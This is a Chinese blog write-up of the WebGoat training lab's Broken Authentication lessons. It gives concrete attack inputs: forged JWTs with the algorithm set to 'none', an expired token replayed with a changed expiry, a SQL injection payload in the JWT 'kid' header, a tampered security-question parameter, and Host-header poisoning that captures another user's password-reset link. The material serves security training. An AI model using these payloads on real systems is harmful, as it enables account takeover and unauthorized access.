【webGoat】Broken Authentication

最新推荐文章于 2024-05-31 15:59:54 发布
最新推荐文章于 2024-05-31 15:59:54 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: # webgoat靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/127142009
版权

目录

Broken Authentication(中断的身份验证)

一、Authentication Bypasses(绕过身份验证)

第2题:

二、JWT tokens

第3题:

第5题:

第7题:

第8题:

第10题:

第11题:

三、Password reset(密码重置)

启动webwolf

第2题:

第4题:

第5题:

第6题: 

Broken Authentication(中断的身份验证)

一、Authentication Bypasses(绕过身份验证)

第2题:

随便提交,然后抓到包

发送到repeater进行研究

secQuestion0和secQuestion1

如果改为2,3的话(任何可能不存在的),没有对应的问题和答案

可能输入null=null,或者输入什么都是对的

改后返回数据包为true

 

二、JWT tokens

第3题:

直接使用JWT在线解密工具

用户名为

user

第5题:

这个垃圾桶是重置的意思

 

想尝试2个方法

1、通过切换用户,将其他用户的权限通过JWT提升为admin(失败)

2、执行删除操作,以admin权限进行 (成功)

方法一(失败)

点击切换为角色Tom

并抓包,其中一个包中发现了token

 JWT解密后

"admin": "false",要将其改为true

避免爆破,直接将其改为{ “alg”: “none”}

base64编码:

{

"alg": "none"
}

ewoKImFsZyI6ICJub25lIgp9

{
"iat": 1665554118,
"admin": "true",
"user": "Tom"
}

ewoiaWF0IjogMTY2NTU1NDExOCwKImFkbWluIjogInRydWUiLAoidXNlciI6ICJUb20iCn0=

(提示:编码时,别带空格,不然最后会这样) 

组合(要去掉=,还要加.):

ewoKImFsZyI6ICJub25lIgp9.ewoiaWF0IjogMTY2NTU1NDExOCwKImFkbWluIjogInRydWUiLAoidXNlciI6ICJUb20iCn0.

只改JWT,失败

 头部删掉后,但还是失败

方法二(成功)

点击垃圾箱,并抓包,改JWT

ewrCoCAiYWxnIjogIm5vbmUiCn0.ewogICJpYXQiOiAxNjY1NTU0MTE4LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJUb20iCn0.

 然后这题就绿了,完成了

第7题:

第8题:

爆破密钥

第10题:

题意为:自己买东西,让Tom支付

根据提示找到已经失效的token

 

eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q

 

加密方法改为none

base64编码:

{

"alg": "none"
}

ewoKImFsZyI6ICJub25lIgp9

exp是时间戳,在这个基础上推迟几十秒

1664698210(这位结束时间,最好在现在的后面2分钟)

我这里是过关后截图的

base64加密

{
"iat": 1526131411,
"exp": 1664698210,
"admin": "false",
"user": "Tom"
}

ewoiaWF0IjogMTUyNjEzMTQxMSwKImV4cCI6IDE2NjQ2OTgyMTAsCiJhZG1pbiI6ICJmYWxzZSIsCiJ1c2VyIjogIlRvbSIKfQ==

组合起来(删除=,加上.)

ewoKImFsZyI6ICJub25lIgp9.ewoiaWF0IjogMTUyNjEzMTQxMSwKImV4cCI6IDE2NjQ2OTgyMTAsCiJhZG1pbiI6ICJmYWxzZSIsCiJ1c2VyIjogIlRvbSIKfQ.

点击checkout后,抓到数据包

发送到repeater

将JWT插入到Authorization后面部分

 

第11题:

(参考的大佬的方法)

点击,删除Tom,抓包

并发送到repeater

eyJ0eXAiOiJKV1QiLCJraWQiOiJ3ZWJnb2F0X2tleSIsImFsZyI6IkhTMjU2In0.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJqZXJyeUB3ZWJnb2F0LmNvbSIsInVzZXJuYW1lIjoiSmVycnkiLCJFbWFpbCI6ImplcnJ5QHdlYmdvYXQuY29tIiwiUm9sZSI6WyJDYXQiXX0.CgZ27DzgVW8gzc0n6izOU638uUCi6UhiOJKYzoEZGE8

1、kid没有防御SQL注入,存在注入点

'; select 'MQ==' from jwt_keys --

2、改变username

Tom

3、改时间戳

1618905304改为现在以后的时间戳

1664703610

3、SQL注入查询的结果会作为签名算法的秘钥来对header和payload进行加密

1

将改后的JWT填上去返回true了

 

三、Password reset(密码重置)

启动webwolf

webwolf出点问题了(在powershell下,解决方法好像是需要将编码方法引起来)

 java -Dfile.encoding=UTF-8 -jar webwolf-8.2.2.jar

(在管理员命令提示符下成功了)

点击进行启动webwolf页面

并使用webGoat账号进行登陆

第2题:

测试webwolf是否可用

使用自己的用户名+@webgoat.org

 收到了新密码

新密码登陆

 

 

第4题:

会提示用户是否存在

然后对存在的用户进行爆破

(颜色可能是英文,可能是中文)

爆破就那些个颜色,没啥难搞的

tom

purple

第5题:

第6题: 

先尝试重置自己的密码

 点击link

fcc02a5f-2c90-4178-974f-048ed485640c可能是身份

 尝试修改Tom密码

再发送邮件

抓包,并发送到repeater

修改Host访问本地的webwolf发邮件

webwolf抓到链接

复制后面的身份验证凭证

(替换重置自己身份的那个URL的身份信息)

9112825a-e642-4eaa-96ad-233e422696cb

 

 登陆成功

黑色地带(崛起)
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Webgoat8(A2) Broken Authentication
weixin_44689968的博客
04-14 560
1.Authentication Bypasses 输入框随意输入:test,test 点击Submit,并使用Burpsuite抓包 Action–>Repeater 修改参数名为secQuestion3和secQuestion4 2.JWT tokens 先点击删除 使用burpsuite抓包
OWASP top10(OWASP十大应用安全风险)之A2 认证失败(Broken Authentication
qq_39682037的博客
03-17 3380
top2 认证失败(Broken Authentication) 损坏的身份验证漏洞可能使攻击者能够使用手动和/或自动方法来尝试控制他们在系统中想要的任何帐户,甚至更糟的是,获得对系统的完全控制。 具有损坏的身份验证漏洞的网站在网络上非常常见。身份验证失败通常是指在应用程序身份验证机制上发生的逻辑问题,例如不良会话管理容易导致用户名枚举-恶意行为者使用蛮力技术猜测或确认系统中的有效用户时。 为了最...
WEB攻防-JAVAWEB项目常见漏洞
最新发布
weixin_45534587的博客
05-31 860
1.JavaWeb常见安全及代码逻辑2.目录遍历&身份验证&逻辑&JWT3.访问控制&安全组件&越权&三方组件本篇主要了解以上问题在javaweb中的呈现,第一个重点理解URL与javaweb代码框架的对应方式,java在没有代码的情况下是很难渗透的,下面的内容也是针对白盒的第二个重点是JWT身份验证/攻击。
网络攻击技术——Broken authentication
weixin_34189116的博客
03-10 325
1.1.1 摘要 在日常的互联网生活当中,我们几乎都离不开用户验证登陆功能,例如:登陆微博,Gmail,博客园,Stackoverflow等网站,这给我们带来了一些不便,就是要管理一堆的用户名和密码,也许有人会说现在很多网站都提供授权验证登陆功能,其中使用最广泛的是OAuth验证机制;在某些情况下,例如一些论坛网站提供微博账户登陆功能,它的实现的却方便了用户,因为它为用户开放服务和重用现有的账户...
WebGoat (A2) Broken Authentication -- Authentication Bypasses (认证绕过)
箭雨镜屋
03-07 1420
目录 一、奇怪的闯关 二、糊涂的代码 三、简单的脑图 一、奇怪的闯关 这道题的目的是绕过对安全问题的验证,获得修改密码的权限。 像上图这样随便乱填两个框,submit之后,burpsuite抓到下面这个报文,把这个报文send to repeater 由于这一页的题目上面举了个例子,是删掉secQuestion0和secQuestion1两个参数就可以的,所以一开始我以为这题也这么操作就好了。但实际上这样操作是要报错的,像下图这样。 既然不能删除,那应该有其他诡异。既然secQu
webgoat-Broken Access ControlI 访问控制失效
seanyang_的博客
11-06 750
直接对象引用直接对象引用是指应用程序使用客户端提供的输入来访问数据和对象。例子使用 GET 方法的直接对象引用示例可能如下所示id=12345img=12345其他方法POST、PUT、DELETE 或其他方法也可能容易受到影响,主要仅在方法和潜在有效载荷上有所不同。不安全的直接对象引用当引用未得到正确处理时,这些被认为是不安全的,并允许授权绕过或披露可用于 执行用户不应能够执行或访问的操作或访问数据。
WebGoatV8.1(A2Broken Authentication)详细过关教程
weixin_51566481的博客
08-29 591
WebGoatV8.1,Broken Authentication
WebGoat通关详解.zip
03-22
WebGoat是一个知名的在线安全训练平台,主要用于教授和实践Web应用程序的安全漏洞和防御技术。它由OWASP(开放式网络应用安全项目)开发,是许多网络安全专业人员和爱好者学习Web安全的首选工具。"WebGoat通关详解....
webgoat7.1
05-17
WebGoat 7.1 是一个著名的网络安全学习平台,专门设计用于教授和实践Web应用程序安全。这个项目由OWASP(开放网络应用安全项目)维护,它包含了一系列精心构造的漏洞,帮助用户了解并防御常见的Web攻击,如SQL注入、...
webGoat7.1
08-01
WebGoat7.1是一个知名的在线安全学习平台,专门用于教授和实践Web应用程序安全相关的技能。这个项目由OWASP(开放网络应用安全项目)维护,是网络安全专家们用来提升自身和他人对抗Web应用攻击能力的重要工具。...
OWASP: Broken Authentication and Session Management
拾月公子
12-23 555
OWASP: Broken Authentication and Session Management
webgoat- Identity & Auth Failure 识别和认证失败
seanyang_的博客
11-02 550
安全问题是一种简单的方法,可以在不要求用户提供验证数据的情况下查找有关用户有效性的信息。问题是,安全问题的类型并不多,而且大多数问题的答案在许多用户中都是相同的。这一直是一个问题,对于许多网站来说仍然是一个问题,当您丢失密码时,网站会询问您 对于您在注册过程中回答的安全问题。在这里,您将找到仍然向您发送明文的网站 电子邮件中的密码。创建强大且安全的密码后,还必须以安全的方式存储密码。验证者在请求记忆的机密时应使用经批准的加密和经过身份验证的受保护通道 以提供对窃听和 MitM(中间人)攻击的抵抗力。
OWASP TOP10系列之#TOP2# A2-损坏的身份认证
weixin_43125873的博客
08-07 313
系列文章目录 提示:本系列将介绍OWASP TOP10 安全漏洞相关介绍,主要针对漏洞类型、攻击原理以及如何防御进行简单讲解;如有错误,还请大佬指出,定会及时改正~ 文章目录系列文章目录前言一、损坏的身份认证漏洞是什么?二、什么情况下会发生损坏的身份认证漏洞三、如何预防?四、身份验证的保证级别 1:密码级别 2:多因素身份验证级别 3:基于密码的身份验证会话管理会话生成和到期总结 前言 损坏的身份认证,即Broken Authentication 一、损坏的身份认证漏洞是什么? 由于身份认证和访问
WebGoat (A2) Broken Authentication -- Password reset (密码重置)
箭雨镜屋
03-10 2312
第2页 这一页就是试试webwolf好不好使 webwolf从这里下载:https://github.com/WebGoat/WebGoat/releases 如果下载很慢或者失败的话,可以在webwolf-8.1.0.jar文件上右键复制链接,然后复制到这个网站下载:https://d.serctl.com/ webwolf v8.1.0应该和webgoat v8.1.0一样,也要java 11. 打开的命令是: java -jar webwolf-8.1.0.jar --server.ad
WebGoat Challenges之Admin password reset
Kainx
10-12 1548
WebGoat 挑战之重置管理员密码
webgoat
frutrue的博客
07-12 399
webgoat挑战
WebGoat8 M17 Password Reset 密码重置 答案、思路、题解
伊维泽诺流浪记
03-09 2358
这部分相比前面JWT要简单很多。 题目2:Email functionality with WebWolf 步入正题,练习题2,点击输入框下面的“Forgot your password?”,然后发一封邮件到 {你的WebGoat用户名}@webgoat.org ,这个带密码的邮件会在Webwolf中被收到,密码就是用户名倒过来。直接用密码登录即可。 题目4:Security...
owasp top10之失效的身份认证和会话管理 笔记
xingxingdoukeyi的博客
10-21 680
身份认证 最常用的地方就是各种登录,现在很多应用使用了手机验证码认证的方式,以及联动QQ,微信,邮箱等登录方式,个人感觉比输入账号密码时SQL注入变少了很多,不过花里胡哨的逻辑漏洞变多了 会话管理 因为http本身是无状态协议,所以需要一些验证机制,会话管理一般为登录状态成功后,由服务器为客户端分配的令牌,要求是唯一并且不可预测,通常为客户端cookie,服务器端session,token两边都有 ...
使用ModSecurity保护WebGoat应用安全
"Securing WebGoat Using ModSecurity" 是一篇关于如何使用开源Web应用防火墙ModSecurity来保护WebGoat应用的文章。WebGoat是一个用于教育的安全项目,旨在帮助学习者了解并防御Web应用程序安全漏洞。ModSecurity ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值